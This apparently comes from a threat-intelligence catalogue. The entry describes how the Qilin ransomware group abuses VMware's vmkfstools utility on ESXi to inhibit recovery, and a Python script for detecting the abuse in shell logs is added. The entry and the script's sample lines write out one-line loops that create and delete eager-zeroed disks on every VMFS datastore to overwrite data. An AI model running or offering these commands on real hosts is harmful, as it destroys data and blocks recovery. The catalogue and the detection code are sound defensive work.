vmkfstools

Inhibit Recovery

A command-line utility in VMware ESXi used to manage and interact with VMFS (Virtual Machine File System) volumes.



Inhibit Recovery

  1. Create an eager-zeroed thick virtual disk at the specified location without displaying any output.

    vmkfstools -c 10M -d eagerzeroedthick $I/eztDisk > /dev/null
    Use case
    Adversary uses vmkfstools to create and immediately delete a 10MB eager-zeroed thick disk on every datastore on the ESXi host. This effectively overwrites the contents of the disk.
    Privileges required
    Administrator
    Operating systems
    ESXi
    Additional Procedural Examples
    • for I in $(esxcli storage filesystem list |grep 'VMFS-5' |awk '{print $1}'); do vmkfstools -c 10M -d eagerzeroedthick $I/eztDisk > /dev/null; vmkfstools -U $I/eztDisk > /dev/null; done
    • for I in $(esxcli storage filesystem list |grep 'VMFS-6' |awk '{print $1}'); do vmkfstools -c 10M -d eagerzeroedthick $I/eztDisk > /dev/null; vmkfstools -U $I/eztDisk > /dev/null; done
    ATT&CK® technique
    T1561.001

    Tags
    E-Crime: Qilin
    Also known as Agenda; written in Golang. Uses a double-extortion technique and targets large enterprises and high-value targets.
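
Detection example, added here and not part of the original entry: it scans shell command history for an eager-zeroed thick disk that is created and then deleted at the same path within a short window, which is the pattern described under Use case. The log line layout (modelled on ESXi shell.log), the 60-second window and the names parse_call and find_wipes are assumptions, and the sample lines are constructed.

```python
import re
from datetime import datetime, timedelta

# Assumed layout, modelled on ESXi shell.log: "<UTC time> shell[<pid>]: [<user>]: <command>"
LINE = re.compile(r"^(\S+)\s+shell\[\d+\]:\s+\[(\w+)\]:\s+(.*)$")
CALL = re.compile(r"\bvmkfstools\s+([^;|&]+)")   # one invocation inside a command line

def parse_call(args):
    """Return ('create' | 'delete', path) for the two calls of interest, else None."""
    tok = re.split(r"\s\d*>|>", args, maxsplit=1)[0].split()   # drop redirections
    if {"-U", "--deletevirtualdisk"} & set(tok):
        return ("delete", tok[-1])
    if {"-c", "--createvirtualdisk"} & set(tok) and "eagerzeroedthick" in tok:
        return ("create", tok[-1])
    return None

def find_wipes(lines, window=timedelta(seconds=60)):
    """Flag an eager-zeroed create followed by a delete of the same path within `window`."""
    created, hits = {}, []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m.group(1)[:19], "%Y-%m-%dT%H:%M:%S")
        for call in CALL.finditer(m.group(3)):
            parsed = parse_call(call.group(1))
            if parsed is None:
                continue
            action, path = parsed
            if action == "create":
                created[path] = ts
            elif path in created and ts - created.pop(path) <= window:
                hits.append({"time": m.group(1), "user": m.group(2), "path": path})
    return hits

# Constructed sample lines (not captured from a real host).
SAMPLE = [
    "2024-05-01T02:10:00Z shell[2101]: [root]: vmkfstools -c 40G -d eagerzeroedthick /vmfs/volumes/ds1/app/app.vmdk",
    "2024-05-01T03:00:00Z shell[2101]: [root]: for I in $(esxcli storage filesystem list |grep 'VMFS-6' |awk '{print $1}'); "
    "do vmkfstools -c 10M -d eagerzeroedthick $I/eztDisk > /dev/null; vmkfstools -U $I/eztDisk > /dev/null; done",
    "2024-05-01T03:05:00Z shell[2101]: [root]: vmkfstools -c 10M -d eagerzeroedthick /vmfs/volumes/ds2/eztDisk >/dev/null 2>&1",
    "2024-05-01T03:05:04Z shell[2101]: [root]: vmkfstools -U /vmfs/volumes/ds2/eztDisk",
    "2024-05-01T09:30:00Z shell[2101]: [root]: vmkfstools -U /vmfs/volumes/ds1/old/old.vmdk",
]

if __name__ == "__main__":
    for hit in find_wipes(SAMPLE):
        print(hit)
```

A loop typed as one command is logged with the variable unexpanded, so the hit reports $I/eztDisk rather than a datastore path; the ordinary 40G disk creation and the unrelated delete are not flagged.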